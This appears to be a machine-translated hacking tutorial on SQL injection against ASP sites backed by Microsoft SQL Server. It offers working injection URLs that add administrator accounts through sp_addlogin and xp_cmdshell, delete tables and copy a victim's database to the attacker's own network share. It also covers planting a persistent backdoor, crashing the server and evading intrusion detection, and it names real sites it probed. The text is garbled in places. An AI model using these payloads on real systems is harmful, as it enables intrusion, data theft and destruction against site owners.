For a lot of news at home and abroad, BBS and e-commerce websites adopt ASP + SQL design, while many programmers write ASP (many just graduated). Therefore, the attack success rate of ASP + SQL is also relatively high. This type of attack method has little to do with the NT version and the SQL version, and there is no corresponding patch, because the vulnerability is caused by the programmer himself, and most of the books that explain ASP programming, this vulnerability exists in the source code example. In fact, only some legitimate ASP requests to SQL leave endless troubles!
This attack method was first originated from the 'or '1' = '1' Vulnerability (which we call as a vulnerability for the time being). I think you should know the principle of this vulnerability, then, Exec
Sp_addlogin Hax (add a Hax user to the database), but this method is very restrictive. First, the SQL Server account used by ASP is an administrator, and then the request is submitted and changed.
Because some programmers use select * from news where id =... and topic =... and .....
If this method is used to request the database
News. asp? Id = 2; Exec sp_addlogin Hax
Select * from news where id = 2; Exec sp_addlogin Hax and topic =... and...
After executing the storage process of sp_addlogin, the entire SQL statement has an and judgment, and the syntax is incorrect. Your sp_addlogin cannot run normally either.
Method
News. asp? Id = 2; Exec sp_addlogin Hax ;--
The -- symbol next to it changes the judgment statement after sp_addlogin into a comment, so there will be no syntax errors. sp_addlogin can be executed normally!
Let's use them together.
News. asp? Id = 2; Exec master. DBO. sp_addlogin Hax ;--
News. asp? Id = 2; Exec master. DBO. sp_password null, Hax, Hax ;--
News. asp? Id = 2; Exec master. DBO. SP_ADDSRVROLEMEMBER SysAdmin Hax ;--
News. asp? Id = 2; Exec master. DBO. xp_cmdshell 'net user Hax/workstations: */times: All/passwordchg: yes/passwordreq: Yes
/Active: yes/add ';--
News. asp? Id = 2; Exec master. DBO. xp_mongoshell 'net localgroup administrators Hax/add ';--
In this way, you have left the Hax Administrator Account in both the database and system.
Of course, the premise is that ASP uses the Administrator account, so you should stop trying the virtual space and there will be no such vulnerability.
In the future, we will discuss how to intrude into ASP if the other party does not use the SQL administrator account. Of course, it will also involve port 1433 intrusion.
Of course, you can try adding a 'symbol after Id = 2, mainly depending on the other's ASP
What should we do when the SQL account used by the ASP program is not the administrator.
For example, on the homepage of Tian Rongxin, you have the following news:
Http://www.talentit.com.cn/news/news-2.asp? Newid = 117
Can you try http://www.talentit.com.cn/news/news-2.asp? Newid = 117; select 123 ;--
Haha, a syntax error is reported. Select 123 is incorrect. Obviously, Tian Rong's ASP end with the 'sign after the newid variable.
So try http://www.talentit.com.cn/news/news-2.asp? Newid = 117 '; Delete news ;--
Haha, I think the news library will be deleted as long as the table name is right.
The SQL account used by ASP is usually the owner of a database even if it is not the Administrator. At least the database has high management permissions.
But we don't know what the database name should do? Let's look at the db_name () function.
Open your query analyzer and check out print db_name ().
Similarly, declare @ A sysname; Set @ A = db_name (); backup database @ A to disk = 'your IP address, your shared directory Bak. dat ', name = 'test ';--
Hehe, his current database is backed up to your hard disk, and everyone will understand what to do next.
Similarly, this method can find the IP address of the other SQL statement.
First install a firewall to Enable ICMP, 139tcp, and 445tcp warnings
And try news. asp? Id = 2; Exec master. DBO. xp_mongoshell 'Ping your ip'
If the firewall prompts someone to ping you, you can be sure that ASP of the other party uses the SQL administrator permission, and also determines the exact location of the SQL server of the other party, because many large
When the website considers performance, the Web service will be separated from the database. when the other party fails to see the source code after the patch is installed, I think only this method can quickly locate the SQL Server location of the other party.
Set
Therefore, if ASP does not have the SQL administrator permission, we cannot call xp_mongoshell. What should we do?
Don't worry, try this news. asp? Id = 2; declare @ A; Set @ A = db_name (); backup database @ A to disk = 'your IP address, your shared directory Bak. dat'
, Name = 'test ';--
Well, your firewall should have issued a warning. Someone connected to your port 445 or port 139 (win9, so that the IP address of the other side's SQL can be exposed.
What should we do if the owner of a database is not connected to the other database? Next time, I will tell you a better way.
In fact, it is a little exaggerated to use the backuo database to your hard disk. If the other database is very large, you can use a dial-up to access the Internet again.
Next time, we will talk about how to cheat IDs in executing ASP + SQL infiltration.
Currently, some good IDs have begun to monitor the xp_mongoshell keywords.
Okay, comrades will see you next time.
All the above URLs should be submitted through VBScript, because the address bar of the browser will shield some special characters, so that your command cannot be completely transmitted.
Window. Location. herf = URL
Supplement: this problem has been raised on the Internet before, but it is only a few simple xp_mongoshell calls that have a lot of restrictions. In fact, there are still many places worth exploring, such
Www.guosen.com.cn. This problem occurs in the certificate documents, and they use the layer-3 structure of MS to use the previously mentioned xp_mongoshell method, and the strings will be filtered,
I tried to enable the telnet service and the account in the Administrators group on the machine of the other party for SQL requests! Because the firewall of the other party is very strict with checkpoint data entry and exit
Therefore, it is difficult to obtain the database structure, but there is still a way to do this: P
By the way, you should pay attention to sqloledb, db_name, OpenRowSet, and OpenDataSource system functions. When the SQL Server account of ASP is just a common user, they will
Very useful!
New SQL Server Vulnerabilities and some breakthroughs
Next I want to talk about some new sqlserver bugs. Although I have worked hard for a long time, I am also lucky to find out that I am afraid to be exclusive.
Identification, of course, it is very likely that some experts already know, after all, I have been in contact with sqlserver for less than one year: P
1. About OpenRowSet and OpenDataSource
Maybe someone already knows this technique, that is, using OpenRowSet to send local commands.
Generally, our usage is (including msdn columns) as follows:
Select * From OpenRowSet ('sqloledb', 'myserver'; 'sa'; '', 'select * From table ')
Visible (even literally) OpenRowSet is only a quick remote database access. It must be followed by select, that is, A recordset must be returned.
So can we use it to call xp_mongoshell? The answer is yes!
Select * From OpenRowSet ('sqloledb', 'server'; 'sa '; '', 'set fmtonly off exec master. DBO. xp_mongoshell'' dir c :\''')
Set fmtonly off must be added to block the default setting of only returned column information. In this way, the output set returned by xp_cmdshell will be submitted to the previous SELECT statement.
By default, an empty set is returned, causing a select error and the command cannot be executed.
So if we want to call sp_addlogin, it will not return any set like xp_cmdshell, so we can no longer rely on fmtonly settings. The following operations can be performed:
Select * From OpenRowSet ('sqloledb', 'server'; 'sa'; '', 'select' OK! ''Exec master. DBO. sp_addlogin hectic ')
In this way, the command will return at least select 'OK! ', Your machine Chamber of Commerce shows OK !, At the same time, the other party's database will also add a hectic account, that is, we use
Select 'OK! The returned set of 'spoofed the local select request. It means that the command can be executed normally. You can also perform this operation using SP_ADDSRVROLEMEMBER and OpenDataSource! As
The real use of this method is easy to think about: P
2. Two msdasql requests
I wonder if you have tried to connect to a remote database using msdasql. Of course, this API must be called by the SQL server administrator.
Select * From OpenRowSet ('msdasql ', 'driver = {SQL
Server}; server = server; address = server, 1433; uid = sa; Pwd =; database = Master; Network = dbmssocn ', 'select * From Table1 select * from
Table2 ')
When the number of fields in Table 1 and Table 2 is different, you will find that the of the other party crashes and local connection fails, and the system resource usage is normal. Use pskill to kill
After the SQL server process, if the machine is not restarted, SQL Server cannot be started normally or the operation is often illegal. I just happened to find this bug.
This problem occurs only on msdasql, and sqloledb does not. It seems that the problem is not that the number of request sets does not match the number of returned sets, because
This is still the problem of msdasql. for specific reasons, let's take a closer look at it: P
3. Terrible Backdoor
In the past, I saw someone on the internet saying that webshells can be added to sqlserver by adding triger, jobs, or rewriting sp_addlogin and SP_ADDSRVROLEMEMBER. These methods are certainly feasible,
But it is easy to be discovered. I wonder if you have thought about the local connection ing of sqloledb. For example, if you use the SQL server administrator account to execute
Command
Select * From OpenRowSet ('sqloledb', 'trusted _ connection = yes; Data Source = hectic ', 'set fmtonly off exec master .. xp_mongoshell
''Dir c :\''')
In this way, a local connection ing named hectic is created on the server of the other party. As long as sqlserver does not restart, the ing will continue to exist, at least I do not know yet.
How can I find connections ing placed by others?
After running the preceding command, you will find that even the Guest user without SQL Server any permission can run the preceding command! And the permission is
LocalSystem! (Default installation) haha! This method can be used to leave a backdoor on sqlserver, which has been intruded into and obtained administrator permissions.
The above method is passed on sqlserver2000 + sqlserver2000sp1!
* There is another guess. I wonder if you have noticed the two DSN that comes with windows by default. One is localserver and the other is msqi. These two are locally managed when they are created.
The member account connects to sqlserver. If the sqlserver of the other party is started through a custom power user, the SA permission is the same as that of the power user, and it is difficult to make a difference.
Run the following command:
Select * From OpenRowSet ('msdasql ', 'dsn = locaserver; trusted_connection = yes', 'set fmtonly off exec master .. xp_mongoshell ''dir
C: \ ''') You should be able to use the Administrator account of localserver to connect to the local sqlserver and then execute local commands with the permissions of this account. After that, I want to break through the SA
The power user permission is granted. The problem is that sqloledb cannot call the DSN connection, while msdasql is not called by the Administrator. Therefore, I am looking for a guest method to call msdasql,
If someone knows how to break through the bug or has a new idea, we can discuss it together. If the bug can be successfully used by guest, it will be a very serious security vulnerability.
Because any SQL statement we mentioned above can be submitted to the other party's ASP to help us execute: P
Using T-SQL to cheat IDs or attack IDS
IDS has become increasingly intelligent.
Some IDs are monitored by xp_mongoshell sp_addlogin.
However, after all, artificial intelligence has never appeared today. Such monitoring is always a lie.
Let's talk about spoofing IDs first:
IDS can be used to monitor the xp_mongoshell keyword.
Declare @ A sysname set @ A = "XP _" + "shell" Exec @ A 'dir c :\'
This code is similar to everyone can see, there is also xp_mongoshell as a store procedure in the master database has an ID number, fixed, we can also do this
Assume that this ID = 988456
Declare @ A sysname select @ A = Name from sysobjects where id = 988456 exec @ A 'dir c :\'
Of course.
Declare @ A sysname select @ A = Name from sysobjects where id = 988455 + 1 exec @ a' dir c :\'
In this way, IDS cannot be fully monitored.
Similarly, sp_addlogin can do the same.
Let's talk about the attack IDs:
Because IDs has a large amount of data, it is usually backed up to a conventional database from day to day, such as SQL Server
Using the old recordset. addnew method will seriously affect the performance of IDs. Because t-SQL requests through ADO are not only efficient, but some work can be handed over to SQL Server.
Proceed
Normally, the program writes
Insert table values ('Day to content ',...)
So let me think about it. If we use
Temp ') exec xp_cmdshell 'dir c :\'--
After submission
Insert table values ('Day to content'... 'temp ') exec xp_1_shell 'dir c :\'--')
In this way, xp_mongoshell can be run in the IDS Database :)
Of course, IDS is a sniffing tool that captures all the messages, and changes the space to % 20 when submitted by the browser.
Therefore, % 20 will be submitted to SQL Server, so that your command cannot be executed.
The only way is
Insert/**/table/**/values ('Day to content '.... 'temp ')/**/exec/**/xp_cmdshell/**/'dir c :\'/**/--')
Use/**/instead of space as the delimiter so that your T-SQL can be executed in the IDS Database.
You can also use other statements to back up IDs databases to your shared directory.
Haha
In fact, the principle of this method is the same as that of attacking ASP, but the space is changed /**/
If ASP is a SELECT statement, 'can be used to block it.
Now IDs uses the insert statement, ') is used to block
Well, you can think about many other new intrusion statements. The best test tool is query analyzer.
Http://www.sanxia.name